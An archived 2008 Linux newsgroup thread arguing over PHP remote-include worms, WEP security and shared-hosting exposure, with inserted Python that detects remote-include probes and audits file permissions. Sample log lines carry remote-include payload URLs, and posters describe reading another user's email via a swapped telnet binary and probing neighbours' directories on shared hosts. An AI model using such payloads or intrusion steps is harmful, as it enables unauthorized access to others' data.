Ubuntu & Antivirus - Ubuntu


Thread: Ubuntu & Antivirus

  1. Re: Ubuntu & Antivirus

    On 2008-03-27, NoStop wrote:
    > Ignoramus17842 wrote:
    >
    >> On 2008-03-27, NoStop wrote:
    >>> Ignoramus17842 wrote:
    >>>
    >>>> On 2008-03-27, NoStop wrote:
    >>>>> Ignoramus17842 wrote:
    >>>>>
    >>>>>> I am sorry to burst anyone's bubble, but there are linux viruses. A
    >>>>>> lot of them spread via bad PHP software. I have seen some in
    >>>>>> action. That's the reason why I avoid PHP where possible.
    >>>>>>
    >>>>> You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>>> spreads via bad PHP software.
    >>>>
    >>>> http://www.theregister.co.uk/2006/02/20/linux_worm/
    >>>> http://vil.nai.com/vil/content/v_136821.htm
    >>>> http://www.pandasecurity.com/enterpr...prod=&entorno=
    >>>>
    >>>> I run a webserver and frequently see those worms probing my
    >>>> webserver. I do not get infected since I have an anti-PHP policy.
    >>>>
    >>>> i
    >>>
    >>> All references are 3 years old. Tell us whether PHP has been patched
    >>> since then.

    >>
    >>
    >> It was patched a lot of times. I do not believe that it fully stopped
    >> PHP viruses. I am not going to do your research for you. Just last
    >> year I saw viruses probing for functions.php files on my server.
    >>

    > Scriptkiddies are ALWAYS probing. How do you know it's a "virus" that's
    > probing and if it is, is it coming from a compromised Windoze box?
    > Probably.


    Keep in mind that I know a lot more about security than you do. So try
    not to get too ****y.

    A year or two ago, I actually analyzed this situation. I had my server
    constantly probed by a virus. I wrote a simple cgi script to catch
    what it was doing.

    I believe that I have a post archived that discusses this. Including
    the source code of the virus.

    What this virus was doing, was to get the PHP software to include a
    remotely hosted malicious PHP code.

    That malicious code would download a perl script that was a little
    hard to read. The script would then run on the compromised box and
    perform malicious actions.

    If you want me to try to find it, I can find that post.

    i
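Added example (not part of the original post, and not the CGI script the poster mentions): one way to spot the remote-include probes described above in a web server access log, by flagging any request parameter whose value is itself a URL. The combined log format, the parameter names, the hostnames and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A parameter whose value is itself a URL is the mark of a remote-include probe.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Undo leftover layers of percent-encoding (probes are often double-encoded)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_probes(lines, allowed_params=frozenset()):
    """Return one finding per request parameter that carries a remote URL.

    allowed_params: names that legitimately hold URLs on this site
    (for example a login redirect), to keep false positives down.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line
        try:
            target = urlsplit(m.group("target"))
        except ValueError:
            continue  # malformed request target
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name in allowed_params:
                continue
            value = fully_decode(value)  # parse_qsl already removed one layer
            if REMOTE_URL_RE.match(value):
                status = int(m.group("status"))
                findings.append({
                    "client": m.group("host"),
                    "path": target.path,
                    "param": name,
                    "remote_url": value.strip(),
                    # 2xx: the script exists and handled the request, review it first.
                    "served": 200 <= status < 300,
                })
    return findings


def summarize(findings):
    """Group findings by client: which paths it probed, and whether any was served."""
    by_client = defaultdict(lambda: {"paths": set(), "served": False})
    for f in findings:
        entry = by_client[f["client"]]
        entry["paths"].add(f["path"])
        entry["served"] = entry["served"] or f["served"]
    return dict(by_client)


# Constructed sample log lines (documentation address ranges, made-up hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Mar/2008:10:01:02 +0000] "GET /index.html HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Mar/2008:10:01:05 +0000] "GET /forum/functions.php'
    '?include_path=http://files.example.invalid/a.txt? HTTP/1.1" '
    '404 209 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [27/Mar/2008:10:01:06 +0000] "GET /wiki/index.php'
    '?page=http%3A%2F%2Ffiles.example.invalid%2Fa.txt%3F HTTP/1.1" '
    '200 18342 "-" "libwww-perl/5.805"',
    '203.0.113.44 - - [27/Mar/2008:10:02:11 +0000] "GET /login.php'
    '?return_to=https://www.example.invalid/account HTTP/1.1" '
    '302 0 "-" "Mozilla/5.0"',
    '203.0.113.90 - - [27/Mar/2008:10:03:40 +0000] "GET /functions.php'
    '?dir=http%253A%252F%252Ffiles.example.invalid%252Fb.txt HTTP/1.0" '
    '404 209 "-" "-"',
]

if __name__ == "__main__":
    hits = find_rfi_probes(SAMPLE_LOG, allowed_params={"return_to"})
    for client, info in sorted(summarize(hits).items()):
        print(client, sorted(info["paths"]), "SERVED" if info["served"] else "not served")
```

A 404 on these requests matches the poster's situation (the probed script is not installed); a 2xx only says the script exists and answered, so that script is the one to inspect.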

  2. Re: Ubuntu & Antivirus

    Moog writes:

    > Hadron illuminated alt.os.linux.ubuntu by typing:
    >
    >>
    >> Bottom line : do not use WEP if you can at all help it.

    >
    > What if you don't have a WPA enabled router? Are there any ways you can


    Then tough I guess. Get a new firmware upgrade or a new router IFF your
    data must remain more secure.

    > secure your WEP access? We know about restricting MAC addresses, but


    We are talking about people eavesdropping. It makes no difference.

    > wouldn't turning off ESSID's and DHCP allocation by the router go a
    > way towards getting WPA like usability from the device?


    No.

    >
    > We can all snort out a wep key, but cloning a MAC address from scratch
    > is *far* less easy. Stopping automatic allocation of IP addresses a
    > must.


    Actually it's trivial - snoopers pick up the mac addresses in use and can
    use them at some later time if you disconnect that HW.

    But we are talking more about snooping - and it's trivially easy to
    snoop.

    Clearly it's more tricky for them to log on to your router - but keeping
    the data that travels through the airwaves secure means do not use WEP.

    --
    no more perl ... it's depressing ...
    i think perl and i need some time from each other
    we made beautiful music together about a year ago ...
    but times have change, we changed ..

  3. Re: Ubuntu & Antivirus

    On 2008-03-27, NoStop wrote:
    > Ignoramus17842 wrote:
    >
    >> On 2008-03-27, Beauregard T. Shagnasty
    >> wrote:
    >>> Ignoramus17842 wrote:
    >>>
    >>>> Beauregard T. Shagnasty wrote:
    >>>>> Ignoramus17842 wrote:
    >>>>>> NoStop wrote:
    >>>>>>> Ignoramus17842 wrote:
    >>>>>>>> I am sorry to burst anyone's bubble, but there are linux viruses.
    >>>>>>>> A lot of them spread via bad PHP software. I have seen some in
    >>>>>>>> action. That's the reason why I avoid PHP where possible.
    >>>>>>>>
    >>>>>>> You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>>>>> spreads via bad PHP software.
    >>>>>>
    >>>>>> http://www.theregister.co.uk/2006/02/20/linux_worm/
    >>>>>> http://vil.nai.com/vil/content/v_136821.htm
    >>>>>> http://www.pandasecurity.com/enterpr...prod=&entorno=
    >>>>>
    >>>>> Those old references do not actually prove these are Linux viruses or
    >>>>> worms. It would seem that if a Windows web server was running
    >>>>> three-year old unpatched PHP or CGI script, the result would be the
    >>>>> same.
    >>>>
    >>>> Sure. If a windows server was running that crap, it would be infected
    >>>> too. Which is the whole point.
    >>>
    >>> But it was not the point you were alluding to, which is, "but there are
    >>> linux viruses." No, they are web server application software
    >>> vulnerabilities, and not Linux vulns - or viruses.

    >>
    >> If Linux runs it, it is a Linux problem. phpbb is a part of some Linux
    >> distros.
    >>
    >>> A hacking attempt is not a virus, either. A PHP (Perl, ASP, C++,
    >>> DotNet, etc) security hole is not a virus, either.
    >>>
    >>> I would define a virus as a self-replicating 'program'.

    >>
    >> That's exactly what they are.
    >>
    >> They exploit the holes, start running on the hacked servers and look
    >> for more servers to hack.
    >>
    >>>>> Notice too, from your third link, that nearly all of the vulns are
    >>>>> cgi scripts. Still nothing to do with Linux.
    >>>>
    >>>> It has everything to do with linux if they run on Linux.
    >>>
    >>> See above. Hacking attempts do not "run on Linux."

    >>
    >> Yes they do. They run on those hacked servers.
    >>
    >>>>>> I run a webserver and frequently see those worms probing my
    >>>>>> webserver. I do not get infected since I have an anti-PHP policy.
    >>>>>
    >>>>> Does that mean you don't use PHP in the sites you write? Or don't
    >>>>> visit sites made with PHP?
    >>>>
    >>>> That means that I do not use PHP on any server that I host, with the
    >>>> exception of mediawiki.
    >>>
    >>> ..so "I do not use PHP" is not true, then. If you use that wiki, PHP is
    >>> installed - and available - on your server. You'd better be careful!

    >>
    >> I am trying to be careful indeed and do not run any PHP stuff other
    >> than Mediawiki.
    >>
    >>>>> I use hand-coded PHP for all my sites, and with no third-party
    >>>>> scripts or "cgi", and have yet to discover a vulnerability. Yes,
    >>>>> they are all hosted on Linux servers running cPanel.
    >>>>
    >>>> If no one knows what code you are writing, you most likely will be
    >>>> safe from automated attacks. But if your hand written code has
    >>>> vulnerabilities, and someone wants to hack you specifically, chances
    >>>> are good that you will be hacked.
    >>>
    >>> Well, it hasn't happened in many years...
    >>>
    >>>> Also if you are on shared hosting, most likely other users of that
    >>>> hosting would be able to see the source code of your script.
    >>>
    >>> I disagree with that statement.

    >>
    >> Give it a try. Try to write a PHP or perl CGI script that would get a
    >> listing of the directory one level above your home directory. Then see
    >> if subdirectories of that place have known sub-subdirectories such as
    >> public_html or whatever you can guess based on the naming convention
    >> that your ISP has for mapping websites to directories.
    >>
    >> Then find out the websites that run on the same IP as you (there are
    >> web sites to help you do this).
    >>
    >> Go from there.
    >>
    >>>> I hacked a user of panix.com 12 years ago
    >>>
    >>> ..and the security hole you used hasn't been patched yet, right?

    >>
    >> My hack was based on a user mistake and not on any security hole.
    >>
    >>
    >>>> because they set up wrong permissions on telnet binary that they
    >>>> uploaded to their account ~/bin/telnet (telnetting to outside was
    >>>> against panix policy and /usr/bin/telnet was mode 710). I then
    >>>> changed it to an altered version that was to run a script that I wrote
    >>>> to set other permissions to read his email. I am not a pro hacker
    >>>> either, it was just a USENET asshole on whom I needed some intel.
    >>>
    >>> Ah. So it wasn't a Linux vuln, or a PHP vuln, but a user shooting
    >>> himself in the foot by not setting up his web site or host correctly.
    >>> Still not a Linux vuln.

    >>
    >> No. But it is a good illustration that getting ****y is a mistake.
    >>
    >>>> If you are on shared hosting, source code of your scripts is almost
    >>>> publicly available (to anyone with $12 to sign up for a month), as,
    >>>> most likely, are your database credentials.
    >>>
    >>> I've used shared hosting for ten years and never been hacked, nor have
    >>> my databases.

    >>
    >> So give the above experiment a try.
    >>
    >>>>> Your references would be valid (except for the Linux part) for web
    >>>>> authors still using Matt Wright's ten year old insecure formmail
    >>>>> script, for example.
    >>>>
    >>>> And a lot of other things.
    >>>
    >>> I did say Matt's well-known bad script, "for example." I regularly get
    >>> requests for "cgi/formmail.pl" - which of course does not exist.
    >>>
    >>>> Security is not simple and PHP is making it very difficult to be
    >>>> secure.
    >>>
    >>> No, of course it is not simple. But your arguments are flawed,
    >>> especially when trying to prove "it's a Linux virus."
    >>>
    >>>> Linux systems are not impervious to viruses. To think otherwise is to
    >>>> delude oneself and to invite trouble.
    >>>
    >>> I've been using Linux at home for about two years and haven't found any
    >>> problem with my computers...
    >>>

    >>
    >> I have been using Linux for 13 years (since 1995) and was not hacked
    >> either.
    >>
    >> i

    >
    > Then you're blowing smoke, aren't you? Why? is the next question.
    >
    > Cheers.
    >


    I am trying to educate you. Don't think that just because you have
    Linux installed, you will never get hacked. That's dangerous
    thinking that is incorrect and leads to trouble.

    Try this:

    http://www.theregister.co.uk/2007/10...nline_banking/

    ``At one point, he said, the bank spent a month as the largest
    phishing target in the country, and in fighting this ongoing problem,
    it has shutdown countless phishing sites surreptitiously installed on
    countless machines across the net.

    "These things are incredibly sophisticated, and when they take over a
    computer, most [users] don't know it," he said. "With every single
    phishing site [Washington Mutual has] shutdown, not one person was
    aware that their machine was compromised and used for
    phishing. That includes university servers and company servers and
    personal PCs and all sorts of things."

    More interesting is that most of the compromised machines were not
    Windows machines. "The vast majority of [the phishing sites] we saw
    were on rootkit-ed Linux boxes, which was rather startling. We
    expected a predominance of Microsoft boxes and that wasn't the case."

    This pleased Microsoft's head of Silicon Valley PR, who served as a
    conference sponsor.

    Botnets are obviously a big problem for eBay as well, but Cullinane
    wouldn't quite say how big. "We see botnet attacks that are massive in
    their size and scope. We did a preliminary analysis and found over - I
    guess I'm not supposed to say that, what the number is - but we found
    a huge number of bots aimed specifically at eBay, trying to do things
    specifically to us."

    The problem has become so bad that eBay operates under the assumption
    that every personal PC is infected, he says. "With the desktop, we're
    starting to run on the assumption that anyone who's trying to contact
    us from their own personal desktop is probably coming from a
    compromised computer." ''
    i
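Added example (not part of the thread): the shared-hosting exposure and the `~/bin/telnet` permission mistake argued over in the quoted exchange above both come down to mode bits that other local accounts can use. This script audits your own directory tree for those bits; the file-name hints and the sample tree are assumptions constructed for illustration.

```python
import os
import stat
import tempfile

# Substrings of file names that often hold database credentials (assumed list).
SECRET_HINTS = ("config", "settings", "passwd", ".env", "credentials")
SCRIPT_EXTS = (".php", ".pl", ".cgi")


def check_path(path, rel):
    """Return the issues for one path, judged only by its own mode bits."""
    st = os.lstat(path)
    mode = st.st_mode
    if stat.S_ISLNK(mode):
        return []  # permission bits on a symlink say nothing about the target
    issues = []
    name = os.path.basename(path).lower()
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        # The ~/bin/telnet case: someone else can replace what you later run.
        issues.append((rel, "writable by group/other"))
    if stat.S_ISDIR(mode) and mode & stat.S_IROTH:
        issues.append((rel, "directory listable by other users"))
    if stat.S_ISREG(mode) and mode & stat.S_IROTH:
        if any(hint in name for hint in SECRET_HINTS):
            issues.append((rel, "credential-like file readable by other users"))
        elif name.endswith(SCRIPT_EXTS):
            issues.append((rel, "script source readable by other users"))
    return issues


def audit_tree(root):
    """Audit `root` and everything below it; returns sorted (path, issue) tuples."""
    issues = check_path(root, ".")
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            issues.extend(check_path(path, os.path.relpath(path, root)))
    return sorted(issues)


def demo():
    """Build a constructed home-directory layout and audit it."""
    layout = {  # relative path -> (is_dir, mode)
        "public_html": (True, 0o755),
        "public_html/index.php": (False, 0o644),
        "public_html/config.php": (False, 0o644),
        "public_html/private": (True, 0o711),       # traversable, not listable
        "public_html/private/db.php": (False, 0o600),
        "bin": (True, 0o700),
        "bin/telnet": (False, 0o777),                # the mistake from the thread
    }
    with tempfile.TemporaryDirectory() as home:
        for rel, (is_dir, _mode) in layout.items():
            path = os.path.join(home, rel)
            if is_dir:
                os.makedirs(path, exist_ok=True)
            else:
                open(path, "w").close()
        for rel, (_is_dir, mode) in layout.items():
            os.chmod(os.path.join(home, rel), mode)  # explicit, ignores umask
        return audit_tree(home)


if __name__ == "__main__":
    for rel, issue in demo():
        print(f"{rel}: {issue}")
```

Whether the read bits can actually be removed depends on whether the host runs your scripts under your own account or under a shared web server user.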

  4. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:
    > On 2008-03-27, NoStop wrote:
    >> All references are 3 years old. Tell us whether PHP has been patched since
    >> then.
    >>

    >
    > It was patched a lot of times. I do not believe that it fully stopped
    > PHP viruses. I am not going to do your research for you. Just last
    > year I saw viruses probing for functions.php files on my server.


    Perhaps it would be wise to do the research for yourself?


    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.

  5. Re: Ubuntu & Antivirus

    Hadron illuminated alt.os.linux.ubuntu by typing:
    > Moog writes:
    >
    >> Hadron illuminated alt.os.linux.ubuntu by typing:
    >>
    >>>
    >>> Bottom line : do not use WEP if you can at all help it.

    >>
    >> What if you don't have a WPA enabled router? Are there any ways you can

    >
    > Then tough I guess. Get a new firmware upgrade or a new router IFF your
    > data must remain more secure.


    It was hypothetical. I have WPA. I know someone who has a non-WPA
    enabled router though. I was hoping to offer advice.

    Looks like...."buy a new WIFI router" is order of the day

    --
    Moog

    "If this is gonna be that kinda party I'm gonna stick my dick in the
    mashed potatoes"

  6. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:


    > If Linux runs it, it is a Linux problem. phpbb is a part of some Linux
    > distros.



    That is about as poor a statement as, "Since I am reading your incorrect
    use of the term 'virus' on a Linux computer, it makes you an Ignoramus."


    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.

  7. Re: Ubuntu & Antivirus

    On 2008-03-27, Moog wrote:
    > Hadron illuminated alt.os.linux.ubuntu by typing:
    >
    >>
    >> Bottom line : do not use WEP if you can at all help it.

    >
    > What if you don't have a WPA enabled router? Are there any ways you can
    > secure your WEP access? We know about restricting MAC addresses, but
    > wouldn't turning off ESSID's and DHCP allocation by the router go a
    > way towards getting WPA like usability from the device?
    >
    > We can all snort out a wep key, but cloning a MAC address from scratch
    > is *far* less easy. Stopping automatic allocation of IP addresses a
    > must.
    >


    I would personally shell out $40 and buy a WPA enabled router.

    i

  8. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:
    > On 2008-03-27, William Poaster wrote:
    >
    >> Beauregard T. Shagnasty wrote:
    >>
    >>
    >>> Ignoramus17842 wrote:
    >>>
    >>>
    >>>> If Linux runs it, it is a Linux problem.
    >>>>
    >>>
    >>>
    >>>

    >> Waste of time, mate.
    >> Mind you, he did admit in comp.os.linux.misc that he trolls, which is why he
    >> changes the number after his "Ignoramus" nym, (which seems to suit him well,
    >> BTW) so he couldn't be quoted on past posts.
    >>
    >>

    >
    > All you can do is whine about my posting alias instead of properly
    > discussing the issue. The question was: can Linux be infected with a
    > virus. And the answer, that I provided, is "sure, if you happen to
    > have installed a PHP package with a bug, for example". You can be
    > disappointed with my posting alias, if you want, but it does not
    > change the truthfulness of what I said.
    >
    > And, mind you, I am being a realist here, not a Windows advocate.
    > Linux has bugs, cracks and viruses. A lot less than Windows, but a
    > non-zero amount.
    >
    > Just a month ago any user of most Linux systems could get root
    > privilege, for at least 2 days.
    >
    > If you were not aware of it, you need to stay more current on Linux
    > security instead of thinking that you can walk on water.
    >
    > Just google 'vmsplice hole'.
    >



    Read the first and second sentence.

    http://en.wikipedia.org/wiki/Computer_virus

    Did you understand, "...the term "virus" is commonly used, albeit
    erroneously,..."?

    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.

  9. Re: Ubuntu & Antivirus

    NoStop wrote:

    > Frank wrote:
    >
    >
    >>NoStop wrote:
    >>
    >>>Ignoramus17842 wrote:
    >>>
    >>>
    >>>
    >>>>I am sorry to burst anyone's bubble, but there are linux viruses. A
    >>>>lot of them spread via bad PHP software. I have seen some in
    >>>>action. That's the reason why I avoid PHP where possible.
    >>>>
    >>>
    >>>You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>spreads via bad PHP software.
    >>>
    >>>Thanks
    >>>
    >>>Cheers.
    >>>

    >>
    >>Live with it old man. You proly have an infected computer and are not
    >>even aware of it.
    >>Ignorance is bliss...LOL!
    >>Frank

    >
    >
    > Sorry numbnuts but no infection here.


    Liar! You're personally infected with MS hate and your urbuttoo is proly
    also infected...LOL!
    Frank

  10. Re: Ubuntu & Antivirus

    On 2008-03-27, John F. Morse wrote:
    > Ignoramus17842 wrote:
    >> On 2008-03-27, William Poaster wrote:
    >>
    >>> Beauregard T. Shagnasty wrote:
    >>>
    >>>
    >>>> Ignoramus17842 wrote:
    >>>>
    >>>>
    >>>>> If Linux runs it, it is a Linux problem.
    >>>>>
    >>>>
    >>>>
    >>>>
    >>> Waste of time, mate.
    >>> Mind you, he did admit in comp.os.linux.misc that he trolls, which is why he
    >>> changes the number after his "Ignoramus" nym, (which seems to suit him well,
    >>> BTW) so he couldn't be quoted on past posts.
    >>>
    >>>

    >>
    >> All you can do is whine about my posting alias instead of properly
    >> discussing the issue. The question was: can Linux be infected with a
    >> virus. And the answer, that I provided, is "sure, if you happen to
    >> have installed a PHP package with a bug, for example". You can be
    >> disappointed with my posting alias, if you want, but it does not
    >> change the truthfulness of what I said.
    >>
    >> And, mind you, I am being a realist here, not a Windows advocate.
    >> Linux has bugs, cracks and viruses. A lot less than Windows, but a
    >> non-zero amount.
    >>
    >> Just a month ago any user of most Linux systems could get root
    >> privilege, for at least 2 days.
    >>
    >> If you were not aware of it, you need to stay more current on Linux
    >> security instead of thinking that you can walk on water.
    >>
    >> Just google 'vmsplice hole'.
    >>

    >
    >
    > Read the first and second sentence.
    >
    > http://en.wikipedia.org/wiki/Computer_virus
    >
    > Did you understand, "...the term "virus" is commonly used, albeit
    > erroneously,..."?
    >


    These PHP exploits are often viruses as they use compromised hosts for
    self propagation.

    i

  11. Re: Ubuntu & Antivirus

    Harold Stevens wrote:
    > In Message-ID: <47eba2bd$0$14353$e4fe514c@news.xs4all.nl> Dirk T. Verbeek:
    >
    > [Snip...]
    >
    >> (I just wonder why it sounded you directed this as an accusation at me?)

    >
    > Sorry; it was NOT my intent at all. I'm actually fed up with wintrolls who
    > hype ancient *nix security lapses as sorryass "examples" of *nix bugs (not
    > you, definitely).
    >
    > If Morris is the best the M$ shills have to offer they're closer to having
    > a final Come To Jesus Meeting about net sanitation than even I imagined.
    >
    > I answered your post, because in it I found what seemed to be some wintard
    > on Morris, as a FU (apparently, the OP tripped into my bozobin).
    >
    > Again, apologies for any confusion about the "target" in my posting.
    >

    Hehe, no problem!

  12. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:


    > Keep in mind that I know a lot more about security than you do. So try
    > not to get too ****y.



    How would anybody know that? Just who are you? (A Wiki link will suffice.)

    I'd venture to guess that most people who have read your messages would
    wholeheartedly disagree with your obviously-****y brag.

    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.

  13. Re: Ubuntu & Antivirus



    "Moog" wrote in message
    news:652f7kF2e47g5U2@mid.individual.net...
    > Hadron illuminated alt.os.linux.ubuntu by typing:
    >
    >>
    >> Bottom line : do not use WEP if you can at all help it.

    >
    > What if you don't have a WPA enabled router? Are there any ways you can
    > secure your WEP access? We know about restricting MAC addresses, but
    > wouldn't turning off ESSID's and DHCP allocation by the router go a
    > way towards getting WPA like usability from the device?
    >
    > We can all snort out a wep key, but cloning a MAC address from scratch
    > is *far* less easy.


    You are joking!
    You can do it in the gui in windows if you want.

    > Stopping automatic allocation of IP addresses a
    > must.


    Makes no difference.


    If you need/want secure wireless using WEP you can set up a tunnel and use
    IPSEC or similar to encrypt it. Anyone can connect to the wireless but they
    aren't going anywhere. There are some nice wireless routers with endpoint
    termination if you want to do it.


  14. Re: Ubuntu & Antivirus

    Beauregard T. Shagnasty wrote:

    > William Poaster wrote:
    >
    >> Beauregard T. Shagnasty wrote:
    >>> Ignoramus17842 wrote:
    >>>
    >>>> If Linux runs it, it is a Linux problem.
    >>>
    >>>
    >>>

    >> Waste of time, mate.
    >> Mind you, he did admit in comp.os.linux.misc that he trolls, which is
    >> why he changes the number after his "Ignoramus" nym, (which seems to
    >> suit him well, BTW) so he couldn't be quoted on past posts.

    >
    > Oh, I see. I thought that "17842" was the number of Linux viruses he's
    > been infected with. Via PHP, of course.


    LOL!

    > I hadn't noticed he was changing the number.



    --
    Mandriva 1 - 2008 - RC2 - 64bit OS.
    COLA trolls: http://colatrolls.blogspot.com/

  15. Re: Ubuntu & Antivirus

    John F. Morse wrote:

    > Ignoramus17842 wrote:
    >> On 2008-03-27, William Poaster wrote:
    >>
    >>> Beauregard T. Shagnasty wrote:
    >>>
    >>>
    >>>> Ignoramus17842 wrote:
    >>>>
    >>>>
    >>>>> If Linux runs it, it is a Linux problem.
    >>>>>
    >>>>
    >>>>
    >>>>
    >>> Waste of time, mate.
    >>> Mind you, he did admit in comp.os.linux.misc that he trolls, which is why he
    >>> changes the number after his "Ignoramus" nym, (which seems to suit him well,
    >>> BTW) so he couldn't be quoted on past posts.
    >>>
    >>>

    >> All you can do is whine about my posting alias instead of properly
    >> discussing the issue. The question was: can Linux be infected with a
    >> virus. And the answer, that I provided, is "sure, if you happen to
    >> have installed a PHP package with a bug, for example". You can be
    >> disappointed with my posting alias, if you want, but it does not
    >> change the truthfulness of what I said.


    And it's been explained, but the ignoramus doesn't get it. And I wasn't whining,
    I was posting what he said. So don't be surprised about his trolling.

    >> And, mind you, I am being a realist here, not a Windows advocate.
    >> Linux has bugs, cracks and viruses. A lot less than Windows, but a
    >> non-zero amount.
    >>
    >> Just a month ago any user of most Linux systems could get root
    >> privilege, for at least 2 days.
    >>
    >> If you were not aware of it, you need to stay more current on Linux
    >> security instead of thinking that you can walk on water.
    >>
    >> Just google 'vmsplice hole'.
    >>

    >
    >
    > Read the first and second sentence.
    >
    > http://en.wikipedia.org/wiki/Computer_virus
    >
    > Did you understand, "...the term "virus" is commonly used, albeit
    > erroneously,..."?
    >


    --
    Mandriva 1 - 2008 - RC2 - 64bit OS.
    COLA trolls: http://colatrolls.blogspot.com/

  16. Re: Ubuntu & Antivirus

    John F. Morse wrote:

    > Ignoramus17842 wrote:
    >
    >
    >> Keep in mind that I know a lot more about security than you do. So try
    >> not to get too ****y.

    >
    >
    > How would anybody know that? Just who are you? (A Wiki link will suffice.)
    >
    > I'd venture to guess that most people who have read your messages would
    > wholeheartedly disagree with your obviously-****y brag.
    >

    Absolutely.

    --
    Mandriva 1 - 2008 - RC2 - 64bit OS.
    COLA trolls: http://colatrolls.blogspot.com/

  17. Re: Ubuntu & Antivirus

    "dennis@home" writes:

    > "Moog" wrote in message
    > news:652f7kF2e47g5U2@mid.individual.net...
    >> Hadron illuminated alt.os.linux.ubuntu by typing:
    >>
    >>>
    >>> Bottom line : do not use WEP if you can at all help it.

    >>
    >> What if you don't have a WPA enabled router? Are there any ways you can
    >> secure your WEP access? We know about restricting MAC addresses, but
    >> wouldn't turning off ESSID's and DHCP allocation by the router go a
    >> way towards getting WPA like usability from the device?
    >>
    >> We can all snort out a wep key, but cloning a MAC address from scratch
    >> is *far* less easy.

    >
    > You are joking!
    > You can do it in the gui in windows if you want.
    >
    >> Stopping automatic allocation of IP addresses a
    >> must.

    >
    > Makes no difference.
    >
    >
    > If you need/want secure wireless using WEP you can set up a tunnel and
    > use IPSEC or similar to encrypt it. Anyone can connect to the wireless
    > but they aren't going anywhere. There are some nice wireless routers
    > with endpoint termination if you want to do it.
    >


    Yeah, ditto if he's using ssh over the link - perfectly safe then.

    --
    bwah, vodka in my mouse

  18. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:

    > On 2008-03-27, NoStop wrote:
    >> Ignoramus17842 wrote:
    >>
    >>> On 2008-03-27, Beauregard T. Shagnasty
    >>> wrote:
    >>>> Ignoramus17842 wrote:
    >>>>
    >>>>> Beauregard T. Shagnasty wrote:
    >>>>>> Ignoramus17842 wrote:
    >>>>>>> NoStop wrote:
    >>>>>>>> Ignoramus17842 wrote:
    >>>>>>>>> I am sorry to burst anyone's bubble, but there are linux viruses.
    >>>>>>>>> A lot of them spread via bad PHP software. I have seen some in
    >>>>>>>>> action. That's the reason why I avoid PHP where possible.
    >>>>>>>>>
    >>>>>>>> You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>>>>>> spreads via bad PHP software.
    >>>>>>>
    >>>>>>> http://www.theregister.co.uk/2006/02/20/linux_worm/
    >>>>>>> http://vil.nai.com/vil/content/v_136821.htm
    >>>>>>> http://www.pandasecurity.com/enterpr...prod=&entorno=
    >>>>>>
    >>>>>> Those old references do not actually prove these are Linux viruses or
    >>>>>> worms. It would seem that if a Windows web server was running
    >>>>>> three-year old unpatched PHP or CGI script, the result would be the
    >>>>>> same.
    >>>>>
    >>>>> Sure. If a windows server was running that crap, it would be infected
    >>>>> too. Which is the whole point.
    >>>>
    >>>> But it was not the point you were alluding to, which is, "but there are
    >>>> linux viruses." No, they are web server application software
    >>>> vulnerabilities, and not Linux vulns - or viruses.
    >>>
    >>> If Linux runs it, it is a Linux problem. phpbb is a part of some Linux
    >>> distros.
    >>>
    >>>> A hacking attempt is not a virus, either. A PHP (Perl, ASP, C++,
    >>>> DotNet, etc) security hole is not a virus, either.
    >>>>
    >>>> I would define a virus as a self-replicating 'program'.
    >>>
    >>> That's exactly what they are.
    >>>
    >>> They exploit the holes, start running on the hacked servers and look
    >>> for more servers to hack.
    >>>
    >>>>>> Notice too, from your third link, that nearly all of the vulns are
    >>>>>> cgi scripts. Still nothing to do with Linux.
    >>>>>
    >>>>> It has everything to do with linux if they run on Linux.
    >>>>
    >>>> See above. Hacking attempts do not "run on Linux."
    >>>
    >>> Yes they do. They run on those hacked servers.
    >>>
    >>>>>>> I run a webserver and frequently see those worms probing my
    >>>>>>> webserver. I do not get infected since I have an anti-PHP policy.
    >>>>>>
    >>>>>> Does that mean you don't use PHP in the sites you write? Or don't
    >>>>>> visit sites made with PHP?
    >>>>>
    >>>>> That means that I do not use PHP on any server that I host, with the
    >>>>> exception of mediawiki.
    >>>>
    >>>> ..so "I do not use PHP" is not true, then. If you use that wiki, PHP
    >>>> is installed - and available - on your server. You'd better be careful!
    >>>
    >>> I am trying to be careful indeed and do not run any PHP stuff other
    >>> than Mediawiki.
    >>>
    >>>>>> I use hand-coded PHP for all my sites, and with no third-party
    >>>>>> scripts or "cgi", and have yet to discover a vulnerability. Yes,
